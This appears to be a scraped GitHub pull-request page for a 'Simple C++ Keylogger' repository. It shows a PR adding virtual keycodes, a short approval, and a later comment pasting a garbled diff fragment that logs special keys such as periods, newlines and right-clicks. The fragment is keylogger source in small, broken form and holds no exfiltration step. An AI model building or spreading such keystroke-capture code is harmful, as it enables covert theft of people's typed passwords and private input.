EgeBalci / Keylogger

Simple C++ Keylogger...
139 stars 90 forks source link

Added more virtual keycodes,updated the executable and building insttructions. #2

Closed TarunSinghania closed 5 years ago

EgeBalci commented 5 years ago

Well done :+1:

BettymanY commented 1 year ago

cout << "\n"; LOG("\n"); return true; case '¾': case '¾': cout << "."; LOG("."); return true; @@ -48,6 +48,38 @@ bool SpecialKeys(int S_Key) { cout << "#R_CLICK#"; LOG("#R_CLICK#"); return true;